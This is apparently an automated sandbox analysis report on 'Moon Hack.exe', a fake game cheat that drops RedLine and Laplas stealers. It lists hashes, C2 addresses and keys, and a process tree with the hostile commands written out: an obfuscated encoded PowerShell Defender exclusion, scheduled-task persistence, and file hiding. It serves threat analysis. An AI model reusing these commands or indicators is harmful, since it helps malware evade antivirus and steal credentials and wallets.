Analysis

  • max time kernel
    134s
  • max time network
    142s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20230703-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    22-07-2023 07:45

General

  • Target

    Moon Hack.exe

  • Size

    1.3MB

  • MD5

    b86d575cfbadc3aa88339316d0ede439

  • SHA1

    7aa793a0998635397aab3df0f9b3e767c31364f8

  • SHA256

    3b50875fcaf6c7b025b28174263cf78534749de54982fc52b296010ce838a7a2

  • SHA512

    1b4a4ec20d0954f0f2d4d98de8b051e6ee7da315648d5e45ab2f24690dc3d97ec7543d8afb53c3df3833490e23023724caf66eec909b55e84747d89268c96927

  • SSDEEP

    24576:0UW4INa580xo0GWFG4jQ1llLNhDaQV8VY8Rt3Z9ws:0Uz9O0xrGWFpQ1jLNhDaQWVY8Rt3Z9h

Malware Config

Extracted

Family

redline

Botnet

@dsfawderwe4128776rafsafsa

C2

94.142.138.4:80

Attributes
  • auth_value

    0b59c02d0b9ebe415e380c8824e6b419

Extracted

Family

laplas

C2

http://185.209.161.189

Attributes
  • api_key

    f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

Signatures

  • Laplas Clipper

    Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 10 IoCs
  • Loads dropped DLL 6 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 27 IoCs
  • Suspicious use of WriteProcessMemory 40 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Moon Hack.exe
    "C:\Users\Admin\AppData\Local\Temp\Moon Hack.exe"
    1⤵
    • Checks computer location settings
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1084
    • C:\Users\Admin\AppData\Local\Temp\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:3372
      • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
        C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
        3⤵
        • Executes dropped EXE
        PID:3568
    • C:\Users\Admin\AppData\Local\Temp\conhost.exe
      "C:\Users\Admin\AppData\Local\Temp\conhost.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1608
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4504
        • C:\Windows\system32\mode.com
          mode 65,10
          4⤵
            PID:3352
          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
            7z.exe e file.zip -p3723400966431979727828169 -oextracted
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:2516
          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
            7z.exe e extracted/file_5.zip -oextracted
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:3240
          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
            7z.exe e extracted/file_4.zip -oextracted
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:2040
          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
            7z.exe e extracted/file_3.zip -oextracted
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:492
          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
            7z.exe e extracted/file_2.zip -oextracted
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:3348
          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
            7z.exe e extracted/file_1.zip -oextracted
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:4312
          • C:\Windows\system32\attrib.exe
            attrib +H "Installer.exe"
            4⤵
            • Views/modifies file attributes
            PID:3684
          • C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
            "Installer.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3928
            • C:\Windows\SysWOW64\cmd.exe
              "cmd.exe" /C powershell -EncodedCommand "PAAjAEsAeABxAHkAcAA1AGYAdgBoADIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBjAGMAeAA5AHUAOQBpAEMAWgBPAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAOABlAEQAQgBDADAASgBjADMAaQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBuAGYAMQBhAG0ATwB2ACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3628
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -EncodedCommand "PAAjAEsAeABxAHkAcAA1AGYAdgBoADIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBjAGMAeAA5AHUAOQBpAEMAWgBPAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAOABlAEQAQgBDADAASgBjADMAaQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBuAGYAMQBhAG0ATwB2ACMAPgA="
                (the -EncodedCommand value is UTF-16LE base64 and decodes to: <#Kxqyp5fvh2#> Add-MpPreference <#ccx9u9iCZOu#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#8eDBC0Jc3i#> -Force <#nf1amOv#>, i.e. a Microsoft Defender exclusion covering the whole user profile and system drive, padded with random block comments as obfuscation)
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3712
            • C:\Windows\SysWOW64\cmd.exe
              "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk6534" /TR "C:\ProgramData\Dllhost\dllhost.exe"
              5⤵
                PID:4796
              • C:\Windows\SysWOW64\cmd.exe
                "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                5⤵
                  PID:1328

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eg4ho35v.1nr.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\conhost.exe

          Filesize

          2.5MB

          MD5

          0aff3062636c07e673c614e4210a7c7e

          SHA1

          bb9266faa98ecc5e3772e9599e4fcf2008a2adcd

          SHA256

          28725b63a75a38a88b1663d49d4ba43ab917ba0d0ce6b700c64be2fefd8ffa8f

          SHA512

          07eaf2b78d959ff6d792d9ff5b5e2783b23a1bd65c59e77094ff3e70f1c902e6bac9c890246989bb9b7b2eeed87076bee54289ef46ece9f8278652690628986e

        • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

          Filesize

          1.6MB

          MD5

          72491c7b87a7c2dd350b727444f13bb4

          SHA1

          1e9338d56db7ded386878eab7bb44b8934ab1bc7

          SHA256

          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

          SHA512

          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

          Filesize

          458KB

          MD5

          619f7135621b50fd1900ff24aade1524

          SHA1

          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

          SHA256

          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

          SHA512

          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

        • C:\Users\Admin\AppData\Local\Temp\main\Installer.exe

          Filesize

          21KB

          MD5

          7aa6a5a626cfa1260178d7bf1bd1dddb

          SHA1

          a7223bb6ba6efad042057120065c49eefb8fc8ea

          SHA256

          0179052465b4f304c3a946cd8c2022192ec672a1cb47bf1fe0bd6039cf77e83c

          SHA512

          2d52d43dd563d02dbfb6607ee2b9e058d11e7af2980eae88c9acf5de4adf4e41bf462841918e509cfad4055bc1cc8535fd3dd1143dec9ba9704134291aa170aa

        • C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

          Filesize

          2.1MB

          MD5

          cfd06a23cdd0cad9964baef2d48709c3

          SHA1

          4fa67da62f36bc24e7655e1a13dd0e41e172586b

          SHA256

          dee2b650d898b91c6ef33f0170af1e3943c47b1a150962a9201b2575f8971acd

          SHA512

          be35d8fdb419153ae63671d67a6beb85e7e4b292c387ffa5ca3d16960c8bdaa6c482135dcc840f4693683a9475c1243dd262294f6ebf58290f6d4d3f13380546

        • C:\Users\Admin\AppData\Local\Temp\main\extracted\Installer.exe

          Filesize

          21KB

          MD5

          7aa6a5a626cfa1260178d7bf1bd1dddb

          SHA1

          a7223bb6ba6efad042057120065c49eefb8fc8ea

          SHA256

          0179052465b4f304c3a946cd8c2022192ec672a1cb47bf1fe0bd6039cf77e83c

          SHA512

          2d52d43dd563d02dbfb6607ee2b9e058d11e7af2980eae88c9acf5de4adf4e41bf462841918e509cfad4055bc1cc8535fd3dd1143dec9ba9704134291aa170aa

        • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

          Filesize

          9KB

          MD5

          8bad123f5cf71fc89af4dcd0b7e0dc3a

          SHA1

          5769ca42cf63173aa1c0bc681f459d1072327390

          SHA256

          c55f35297c28db3ca4b6d4d32902fdfe0567ce1c2e47877b07ceca79772153d9

          SHA512

          de6f00d1f7bab9db779d4b7e07ba4ca7156def2b36861d5e0485037d6ad7b136920bd263c2e293b5acd85bcc6c8cd021db310944aac0758fe065bf0856b8e22a

        • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip

          Filesize

          9KB

          MD5

          ac80078a2f3e04e44399d76f04ea0d9f

          SHA1

          efd7b3c6cc78cbc023a55c9a3bfb7857183ffca4

          SHA256

          cbb94cd884f6bac87ba0379ef1f53b994736614ccd8c01d57403fb515fb70219

          SHA512

          37c55dde344b570fc3c0b661461625ca619a3a16081c30ccc1e51257be3823cbb541aa23df4e949456b5bfb5392da1437333719b0471dd03d4cc07d995bde72f

        • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip

          Filesize

          9KB

          MD5

          7df98a3b1c1e55f5568bb3bf91fc0f9a

          SHA1

          7dd14a2c8a725178b2559a4b7c5d9373db5fa58b

          SHA256

          4c3b0cc50af879e4e77a3ff5a5cefc66bcb96c4d3f4a4c61ffa7a5f4c5f1f864

          SHA512

          6542aeeea8ee96bdc13b7b055196c54deff8f665ff73d4349a374e68e3e128aeaadaea16285bf3a2898b994250fa9fd5fa1e4db87a4d0203ce06ed2e49c947e4

        • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip

          Filesize

          9KB

          MD5

          7703f67bf5a848f11f611f2adc8a9b9d

          SHA1

          36dad4be75e2cabab5dd5f12557c9677f17687ab

          SHA256

          da71fd4d58da91ce7d3ae21ca2c9887d95c9b414f4cdd8ba99ab8d04340e9139

          SHA512

          9a9eeab6a612ad9a51f631f16df9a9134f5b3a1ad3bad1005f79e2c972ecdcd166b8faae429fddc9c787603352ef380291e6b2add4a9e65108c9062dc245839f

        • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip

          Filesize

          1.5MB

          MD5

          b43a823d7de0d2b913cba1aa08932eb6

          SHA1

          94b5f3aa5f8cbf976c3a87c9748bdc1133780f50

          SHA256

          b7ee030ccada50a20f87da01573fb9d0cff405fe9f5eab85df66acd020bc29af

          SHA512

          f45f20e7cccb752f5b4545f2e4f8418a173707e1131b2d4a8775d4dfef957b9f3319289dfd04f6c7ac0f7be09de6565c1d04ee570b275926f5f02822948ea431

        • C:\Users\Admin\AppData\Local\Temp\main\file.bin

          Filesize

          1.5MB

          MD5

          164ffbb4ce7fe04803078a77496f8aeb

          SHA1

          4716b5e07012785ed9f021c8f556c69e5924f4b4

          SHA256

          32f533b3aa6bd4d96996ba38ca84aeba408a758247c3ab55919a7f2a46ea8326

          SHA512

          1f28144563188300fe45c676581e43c43dc2aaaf9e46369bf3fc3825179fbeee47668cdd4c4e5ee63758bd81a455b9f2e2f53305fb4993551317ec40df87a14b

        • C:\Users\Admin\AppData\Local\Temp\main\main.bat

          Filesize

          471B

          MD5

          3b580d215631fc66c021c462c5d67341

          SHA1

          4f19ac12e1430b38954c6c9b5500f1dc6375259f

          SHA256

          dbf6cb5907b1210156b9ec4ce3c1ac9d687c5128b11ae90cdf23ef6c33d7b164

          SHA512

          e9eabb070774411fba16624844ee726f577829fca197a9afee2b96e2519dcbe5dde55388dffaba0d3bcb421e99ed33a63451a4cc385d64db4bac3c68be731e81

        • C:\Users\Admin\AppData\Local\Temp\svchost.exe

          Filesize

          4.0MB

          MD5

          d076c4b5f5c42b44d583c534f78adbe7

          SHA1

          c35478e67d490145520be73277cd72cd4e837090

          SHA256

          2c63c61e0adaaf669c9c674edfc9081d415c05b834611944a682f120ab9559d8

          SHA512

          b2dfcf98695e7e40578f02a104a1c2fa1de29d13b0056d3dc4a5689168546f437bfd6acbc99e3766f94efb01bac5c908f3e80795f017e1629c97b6b1026ce638

        • C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

          Filesize

          762.0MB

          MD5

          93a15a6020ab44015a84152ef3156103

          SHA1

          6e23b599dc553eb3e51d4f2fe3ea41ec38ee1e94

          SHA256

          5905256b076568489b58bcc06a76058433967650d2a51ca2cf6d9162337c10fb

          SHA512

          e02e9e1fa163ca2744bfb87db0e559663cc7c52904d8ca319aa84ae28176cd562af60566a6090656373231efed1b909dc137c0090df7d1bd3eae7d2dfc308dbf

        • memory/1084-146-0x0000000006D10000-0x0000000006DA2000-memory.dmp

          Filesize

          584KB

        • memory/1084-144-0x0000000000400000-0x0000000000555000-memory.dmp

          Filesize

          1.3MB

        • memory/1084-151-0x0000000009F60000-0x000000000A48C000-memory.dmp

          Filesize

          5.2MB

        • memory/1084-150-0x0000000009D80000-0x0000000009F42000-memory.dmp

          Filesize

          1.8MB

        • memory/1084-149-0x00000000097B0000-0x0000000009D54000-memory.dmp

          Filesize

          5.6MB

        • memory/1084-148-0x0000000009740000-0x00000000097A6000-memory.dmp

          Filesize

          408KB

        • memory/1084-147-0x0000000075130000-0x00000000758E0000-memory.dmp

          Filesize

          7.7MB

        • memory/1084-191-0x0000000075130000-0x00000000758E0000-memory.dmp

          Filesize

          7.7MB

        • memory/1084-145-0x0000000006120000-0x0000000006196000-memory.dmp

          Filesize

          472KB

        • memory/1084-152-0x0000000004D10000-0x0000000004D20000-memory.dmp

          Filesize

          64KB

        • memory/1084-143-0x00000000062E0000-0x000000000631C000-memory.dmp

          Filesize

          240KB

        • memory/1084-142-0x00000000061E0000-0x00000000061F2000-memory.dmp

          Filesize

          72KB

        • memory/1084-141-0x0000000005BD0000-0x0000000005CDA000-memory.dmp

          Filesize

          1.0MB

        • memory/1084-140-0x00000000053F0000-0x0000000005A08000-memory.dmp

          Filesize

          6.1MB

        • memory/1084-153-0x0000000007F20000-0x0000000007F70000-memory.dmp

          Filesize

          320KB

        • memory/1084-133-0x0000000000800000-0x0000000000830000-memory.dmp

          Filesize

          192KB

        • memory/1084-139-0x0000000004D10000-0x0000000004D20000-memory.dmp

          Filesize

          64KB

        • memory/1084-138-0x0000000075130000-0x00000000758E0000-memory.dmp

          Filesize

          7.7MB

        • memory/1084-134-0x0000000000400000-0x0000000000555000-memory.dmp

          Filesize

          1.3MB

        • memory/3712-237-0x0000000075130000-0x00000000758E0000-memory.dmp

          Filesize

          7.7MB

        • memory/3712-259-0x0000000071720000-0x000000007176C000-memory.dmp

          Filesize

          304KB

        • memory/3712-286-0x0000000075130000-0x00000000758E0000-memory.dmp

          Filesize

          7.7MB

        • memory/3712-238-0x00000000056D0000-0x00000000056E0000-memory.dmp

          Filesize

          64KB

        • memory/3712-239-0x00000000056D0000-0x00000000056E0000-memory.dmp

          Filesize

          64KB

        • memory/3712-240-0x0000000005D10000-0x0000000006338000-memory.dmp

          Filesize

          6.2MB

        • memory/3712-241-0x0000000005920000-0x0000000005942000-memory.dmp

          Filesize

          136KB

        • memory/3712-247-0x0000000005C10000-0x0000000005C76000-memory.dmp

          Filesize

          408KB

        • memory/3712-283-0x0000000007EA0000-0x0000000007EA8000-memory.dmp

          Filesize

          32KB

        • memory/3712-252-0x0000000006910000-0x000000000692E000-memory.dmp

          Filesize

          120KB

        • memory/3712-253-0x00000000056D0000-0x00000000056E0000-memory.dmp

          Filesize

          64KB

        • memory/3712-257-0x000000007EE20000-0x000000007EE30000-memory.dmp

          Filesize

          64KB

        • memory/3712-258-0x00000000078C0000-0x00000000078F2000-memory.dmp

          Filesize

          200KB

        • memory/3712-236-0x0000000001820000-0x0000000001856000-memory.dmp

          Filesize

          216KB

        • memory/3712-269-0x0000000006EE0000-0x0000000006EFE000-memory.dmp

          Filesize

          120KB

        • memory/3712-270-0x0000000008260000-0x00000000088DA000-memory.dmp

          Filesize

          6.5MB

        • memory/3712-271-0x0000000007C20000-0x0000000007C3A000-memory.dmp

          Filesize

          104KB

        • memory/3712-274-0x0000000007C90000-0x0000000007C9A000-memory.dmp

          Filesize

          40KB

        • memory/3712-282-0x0000000007F50000-0x0000000007F6A000-memory.dmp

          Filesize

          104KB

        • memory/3712-276-0x0000000007EB0000-0x0000000007F46000-memory.dmp

          Filesize

          600KB

        • memory/3712-281-0x0000000007E60000-0x0000000007E6E000-memory.dmp

          Filesize

          56KB

        • memory/3928-280-0x0000000005650000-0x0000000005660000-memory.dmp

          Filesize

          64KB

        • memory/3928-275-0x0000000075130000-0x00000000758E0000-memory.dmp

          Filesize

          7.7MB

        • memory/3928-233-0x0000000005650000-0x0000000005660000-memory.dmp

          Filesize

          64KB

        • memory/3928-234-0x00000000054E0000-0x00000000054EA000-memory.dmp

          Filesize

          40KB

        • memory/3928-232-0x0000000075130000-0x00000000758E0000-memory.dmp

          Filesize

          7.7MB

        • memory/3928-231-0x0000000000A80000-0x0000000000A8C000-memory.dmp

          Filesize

          48KB

        • memory/3928-291-0x0000000075130000-0x00000000758E0000-memory.dmp

          Filesize

          7.7MB